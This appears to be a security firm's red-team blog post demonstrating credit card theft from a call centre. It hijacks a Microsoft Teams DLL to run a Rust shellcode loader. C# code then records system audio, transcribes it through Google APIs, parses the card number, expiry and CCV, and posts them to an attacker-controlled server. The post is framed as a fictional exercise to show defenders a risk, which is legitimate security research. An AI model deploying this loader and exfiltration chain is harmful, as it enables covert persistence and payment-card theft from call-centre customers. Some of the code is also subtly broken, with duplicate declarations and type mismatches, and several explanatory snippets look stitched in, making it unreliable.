By Sekuro Offensive Security Team

Introduction

In this post, we discuss a fictitious scenario in which an organisation provides a call centre function to its customers and sometimes processes credit card payments. The organisation has concluded that an attacker extracting credit cards from the call centre by means of eavesdropping is low risk because “they are not going to listen to 10 hours of a workday for 3 or 4 credit cards”. Even if such an attack is considered unlikely, does an attacker really need to listen to every word?

There is no greater danger than underestimating your opponent.

Laozi, 老子 ~ Chinese Philosopher

We will approach this problem from the perspective of an attacker with assumed access or the ability to create files.

In the fictitious scenario, we have identified:

- Customer calls are routed through Microsoft Teams to call centre staff

- Most customer calls are to help with account issues

- No more than 4 credit cards will be processed by a staff member in a typical workday

Solutions to implement:

1. Persistent method to eavesdrop in the call centre

We will persist in the call centre by identifying a dynamic-link library (DLL) search order hijack in the Microsoft Teams software. If unfamiliar, DLL hijacking is a technique where an application loads a DLL other than the one that was intended by the developer.



To identify a target DLL we will launch Procmon with the following three filters:

- Match any process name with “Teams.exe”

- Match the result of any events with the value of “NAME NOT FOUND”

- The final filter ensures matched events are DLLs

The Teams.exe application is in the following user-writable location:

- %USERPROFILE%\AppData\Local\Microsoft\Teams\current



DLL search order hijacking takes advantage of how Windows searches for a required DLL. Any DLL placed in the same directory as the Teams application, and whose name matches one of the DLLs reported with “NAME NOT FOUND”, will be loaded into memory by the Teams application. This happens because the standard DLL search order first checks the directory from which the application was loaded for the required DLL.
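From a defender's point of view, the resolution rule described above can be modelled in a few lines. The following is a minimal sketch, not a reproduction of the Windows loader: the `SearchDir` type and the `resolve` and `is_suspicious` functions are hypothetical names introduced for illustration, directories are modelled in memory rather than read from disk, and the real loader applies additional rules that are omitted here. It shows only that the first directory in the order containing a matching name wins, and that a match in a user-writable directory is worth reviewing.

```rust
/// One directory in a simplified search order, modelled in memory.
/// (Hypothetical type for illustration; this is not a Windows API.)
struct SearchDir<'a> {
    path: &'a str,
    user_writable: bool,
    files: &'a [&'a str],
}

/// Return the first directory, in search order, that contains `dll`.
/// File names are compared case-insensitively.
fn resolve<'a>(order: &'a [SearchDir<'a>], dll: &str) -> Option<&'a SearchDir<'a>> {
    order
        .iter()
        .find(|dir| dir.files.iter().any(|f| f.eq_ignore_ascii_case(dll)))
}

/// A load deserves review when the directory that satisfies it is user-writable.
fn is_suspicious(order: &[SearchDir<'_>], dll: &str) -> bool {
    resolve(order, dll).map_or(false, |dir| dir.user_writable)
}
```

With the application directory listed first and marked as user-writable, a DLL name that exists both there and in the system directory resolves to the application directory and is flagged, whereas a name found only in the system directory is not.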

Our DLL, written in Rust, will function as a simple loader for our second stage shellcode. A loader is a program that on execution loads another program, in our case the shellcode, into memory and executes it. The shellcode will be created from a program written in C# to take advantage of some of the abstractions the .NET Framework provides.

We start by declaring our imports:

use winapi::{

ctypes::c_void,

shared::{

minwindef::{BOOL, DWORD, HINSTANCE, LPVOID, TRUE},

},

um::{

memoryapi::{VirtualAlloc, VirtualProtect, WriteProcessMemory},

processthreadsapi::{CreateThread, GetCurrentProcess},

winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ, PAGE_READWRITE},

},

};

If a DLL exposes an entry point function named DllMain, Windows calls it when the DLL is loaded or unloaded and when the process starts or stops a thread, so user-defined code runs on each of these events. On DLL_PROCESS_ATTACH, when the DLL is first loaded into the process memory space, our DllMain function calls a function to execute the shellcode in a thread.

The following code demonstrates that:

#[no_mangle]

#[allow(non_snake_case, unused_variables)]

extern "system" fn DllMain(

dll_handle: HINSTANCE,

call_reason: DWORD,

reserved: LPVOID,

) -> BOOL {

const DLL_PROCESS_ATTACH: DWORD = 1;

const DLL_PROCESS_DETACH: DWORD = 0;

match call_reason {

DLL_PROCESS_ATTACH => {

inline_thread();

},

DLL_PROCESS_DETACH => {},

_ => {},

}

TRUE

}

fn inline_thread() {

let mut shellcode = include_bytes!("../loader.bin").to_vec();

let shellcode_ptr: *mut c_void = shellcode.as_mut_ptr() as *mut c_void;

unsafe {

let addr_shellcode = VirtualAlloc(

0 as _,

shellcode.len(),

MEM_COMMIT | MEM_RESERVE,

PAGE_READWRITE

);

let mut ret_len: usize = 0;

let _ = WriteProcessMemory(

GetCurrentProcess(),

addr_shellcode,

shellcode_ptr,

shellcode.len(),

&mut ret_len

);

let mut old_protect: u32 = 0;

let _ = VirtualProtect(

addr_shellcode,

shellcode.len(),

PAGE_EXECUTE_READ,

&mut old_protect

);

let _ = CreateThread(

0 as _,

0 as _,

std::mem::transmute(addr_shellcode),

0 as _,

0 as _,

0 as _,

);

}

}
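The call reasons that DllMain matches on are small integer constants defined in the Windows headers. As a brief aside, the sketch below maps each of the four values to a description; `describe_reason` is a hypothetical helper added purely for illustration and is not part of the loader above.

```rust
// Reason codes passed to DllMain, as defined in the Windows headers.
const DLL_PROCESS_DETACH: u32 = 0;
const DLL_PROCESS_ATTACH: u32 = 1;
const DLL_THREAD_ATTACH: u32 = 2;
const DLL_THREAD_DETACH: u32 = 3;

/// Describe why DllMain was called (hypothetical helper for illustration).
fn describe_reason(call_reason: u32) -> &'static str {
    match call_reason {
        DLL_PROCESS_ATTACH => "DLL loaded into the process",
        DLL_PROCESS_DETACH => "DLL unloaded from the process",
        DLL_THREAD_ATTACH => "new thread started in the process",
        DLL_THREAD_DETACH => "thread exiting cleanly",
        _ => "unknown reason",
    }
}
```

Only the first of these matters for the scenario in this post, since it fires once when the DLL is first mapped into the process.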

The second stage shellcode is read from the file “loader.bin” at compile time with the “include_bytes!()” macro. Rust function-like macros look like function calls but operate on the tokens specified as their argument. A macro is a way of writing code that writes other code, also known as metaprogramming. In practice this means that, whilst writing and debugging our second stage payload, all that needs to be done is to place the shellcode into the project directory with the name “loader.bin”.



The only thing remaining for the DLL hijack is to decide on a target. In this case we will use “midimap.dll”, although any unresolved DLL would have sufficed. We then take advantage of the Koppeling project (https://github.com/monoxgas/Koppeling) for export cloning and function proxying.

Export cloning is used so that when an executable attempts to resolve a function for execution in a DLL, either via the Import Address Table (IAT) or GetProcAddress (DLL loaded via LoadLibrary not specifying required functionality), the DLL Export Address Table (EAT) contains the expected functionality.

Function proxying is used so that any intended functionality in the application is not lost. This means that our DLL's EAT will link to the EAT of the DLL that was intended to be loaded. In our example, without function proxying, none of the Microsoft Teams sounds, such as the hang up, incoming call and outgoing call sounds, would be audible to the end user. This may bring our presence to the attention of the end user, which is something we would like to avoid.



Place the DLL at the following location, “%USERPROFILE%\AppData\Local\Microsoft\Teams\current\midimap.dll”, so that, with standard search order checks, our DLL will be loaded.



To demonstrate that our DLL was loaded, we allocate a console rather than execute shellcode, which is covered next. Allocating a console gives an application a window for standard input, standard output, and standard error. Graphical user interface (GUI) applications are not initialised with a console; hence Microsoft Teams is not initialised with one. In this example we allocate a console via the kernel32!AllocConsole function and print ASCII text to standard output as a proof of concept (PoC) to verify everything is working as expected.

We can see the console allocated as a child process (conhost.exe), and our DLL loaded into memory from the directory we placed it in:

2. Automate the identification of credit card details

Fortunately, the Microsoft Teams desktop app has already been approved to access the microphone, and since we live within the “Teams.exe” process we inherit that access. The following C# code registers an event handler for speech recognised from the microphone on the target system. An event handler is a function that is executed when an event occurs. In .NET, events let a subscriber register with, and receive notifications from, a provider. The event handler, “recognition_Handler”, is responsible for deciding what to do with the recognised speech.

static void Main(string[] args)

{

using (

SpeechRecognitionEngine recognizer = new SpeechRecognitionEngine(new System.Globalization.CultureInfo("en-US")))

{

recognizer.LoadGrammar(new DictationGrammar());

recognizer.SpeechRecognized +=

new EventHandler(recognition_Handler);

recognizer.SetInputToDefaultAudioDevice();

recognizer.RecognizeAsync(RecognizeMode.Multiple);

while (true) {}

}

}
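The subscriber and provider relationship behind .NET events is not specific to C#. As a rough, language-neutral illustration, the sketch below models it in Rust, which has no built-in event construct; the `Provider` type and its `subscribe` and `raise` methods are hypothetical names chosen for this example and do not correspond to any .NET or speech API.

```rust
/// A minimal event provider: subscribers register handlers, and the
/// provider calls each one when an event is raised.
/// (Hypothetical type for illustration only.)
struct Provider {
    handlers: Vec<Box<dyn FnMut(&str)>>,
}

impl Provider {
    fn new() -> Self {
        Provider { handlers: Vec::new() }
    }

    /// Register a handler, the rough analogue of `+=` on a .NET event.
    fn subscribe(&mut self, handler: impl FnMut(&str) + 'static) {
        self.handlers.push(Box::new(handler));
    }

    /// Notify every registered handler, in registration order.
    fn raise(&mut self, event: &str) {
        for handler in self.handlers.iter_mut() {
            handler(event);
        }
    }
}
```

A caller would create a `Provider`, pass a closure to `subscribe`, and later call `raise`; every subscribed closure then runs with the event text, which mirrors how a registered handler is invoked each time the provider reports an event.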

It may be interesting to know that we are not actually interested in the microphone audio. Why is that?

Well, when the call centre operator is on the phone to the customer, they would not repeat the sensitive information aloud but rather allow the customer to read it out. That information will be sent to the audio output of the device for the operator to hear, and that output is therefore what we, as the emulated attacker, must target.

As the astute reader you are, you may have already guessed another potential avenue to extract the target information. If the call centre operator types the credit card number out on their keyboard, we could log keystrokes and have an easy win. Great idea! In this scenario, however, we further assume that keylogging would not provide the information we are after, for example because the operator enters it on a separate device.

static void recognition_Handler(object sender, SpeechRecognizedEventArgs e)

{

TimeSpan t = DateTime.UtcNow - new DateTime(1970, 1, 1);

int secondsSinceEpoch = (int)t.TotalSeconds;

RecordSystem(secondsSinceEpoch);

Thread.Sleep(5000)

var customer_rec = File.ReadAllBytes(secondsSinceEpoch.ToString() + ".wav");

string b64_customer_bytes = Convert.ToBase64String(customer_rec);

analysis(b64_customer_bytes).Wait();

File.Delete(secondsSinceEpoch.ToString() + ".wav");

}

public static void RecordSystem(int secondsSinceEpoch)

{

MemoryStream waveInput = new MemoryStream();

WasapiLoopbackCapture CaptureInstance = new WasapiLoopbackCapture();

WaveFileWriter RecordedAudioWriter = new WaveFileWriter(secondsSinceEpoch.ToString() + ".wav", CaptureInstance.WaveFormat);

CaptureInstance.DataAvailable += (s, a) =>

{

RecordedAudioWriter.Write(a.Buffer, 0, a.BytesRecorded);

};

CaptureInstance.RecordingStopped += (s, a) =>

{

RecordedAudioWriter.Dispose();

RecordedAudioWriter = null;

CaptureInstance.Dispose();

};

CaptureInstance.StartRecording();

Thread.Sleep(5000);

CaptureInstance.StopRecording();

}

The event handler does the following:

- Keeps track of when the recording took place

- Records the system output for five seconds

- Sends the recorded system audio to the analysis function

The analysis function uses the Google Speech-To-Text API to transcribe the recorded system audio, then passes the transcript to the Google Natural Language API to identify entities such as the customer's name. The inbuilt Microsoft “SpeechRecognitionEngine” works well enough if the dictionary for recognition is small; otherwise the accuracy is not great.

static async Task<HttpResponseMessage> analysis(String b64)

{

try

{

String payload = JsonConvert.SerializeObject( new {

config = new {

languageCode = "en-AU",

encoding = "LINEAR16",

sampleRateHertz = "16000",

},

audio = new {

content = b64,

},

});

var content = new StringContent(payload, Encoding.UTF8, "application/json");

HttpResponseMessage response = await client.PostAsync("https://speech.googleapis.com/v1/speech:recognize?key=<INSERT-KEY>", content);

String respBody = await response.Content.ReadAsStringAsync();

GoogleRet googleRet = JsonConvert.DeserializeObject<GoogleRet>(respBody);

String transcript = googleRet.results[0].alternatives[0].transcript;

String payload1 = JsonConvert.SerializeObject(new

{

document = new

{

type = "PLAIN_TEXT",

content = transcript,

}

});

var content1 = new StringContent(payload1, Encoding.UTF8, "application/json");

HttpResponseMessage response1 = await client.PostAsync("https://language.googleapis.com/v1/documents:analyzeEntities?key=<INSERT-KEY>", content1);

String respBody1 = await response1.Content.ReadAsStringAsync();

Payload parsed = parse_target(transcript, respBody1, b64);

Payload parsed = parse_target(respBody, b64);

sendPayload(respBody).Wait();

return response;

}

catch (Exception e)

{

return null;

}

}



Once the speech has been analysed, the “parse_target” function performs a primitive parse on the text to create the payload to send remotely. The payload consists of a customer name, card number, expiry, CCV, transcript and base64 encoded recording.

static Payload parse_target(String transcript, String entitiy_raw, String b64)

{

try

{

GoogleEntities googleRet = JsonConvert.DeserializeObject<GoogleEntities>(entitiy_raw);

String transcript = googleRet.results[0].alternatives[0].transcript;

string[] words = transcript.Split(' ');

Payload payload = new Payload { };

payload.b64_recording = b64;

payload.number = "";

String exp_ccv = "";

foreach (Entity entity in googleRet.entities)

{

if (entity.type == "PERSON")

{

payload.name = entity.name;

}

}

foreach (string word in words)

{

if (!word.All(Char.IsLetter))

{

if (payload.number.Length <= 16)

{

int num_len = payload.number.Length;

if ((num_len + word.Length) < 16)

{

payload.number += word;

}

else

{

int left = 16 – num_len;

payload.number += word.Substring(0, left);

exp_ccv += word.Substring(left);

}

}

else

{

exp_ccv += word;

}

}

}

payload.expiry = exp_ccv.Substring(0, exp_ccv.Length - 3);

payload.ccv = exp_ccv.Substring(exp_ccv.Length - 3);

return payload;

}

catch (Exception e)

{

return null;

}

}

The transcript and recording are sent as part of the payload so that any future improvements to parser logic can be applied to all historic recordings.

3. Send collected data to infrastructure that we control

At this point, if we were dealing with actual sensitive data, it would be imperative to encrypt the data in transit. We are now ready to send the collected information to a web server we control.

static async Task<HttpResponseMessage> sendPayload(Payload payload)

{

try

{

var payloadStr = JsonConvert.SerializeObject(payload);

var content = new StringContent(payloadStr, null, "application/json");

HttpResponseMessage response = await client.PostAsync("https://<target-url>/static/register", content);

return null;

}

catch (Exception e)

{

return null;

}

}

Server side, we can see the collected information and fortunately we have the transcript and recording to further tune our parsing method and confirm the information gathered.

4. Conclusion

This was a quick exercise to demonstrate a minimal-effort campaign to extract sensitive information from a fictional organisation.

We created a PoC that exfiltrated credit card information without requiring the attacker to listen to any of the actual call centre conversations. These actions were performed with the same privileges that the call centre operator has on their everyday work machine. The exercise further demonstrated how, once a machine is compromised, a trusted application can be used for long-term persistence, with potential impact on an organisation's reputation and compliance.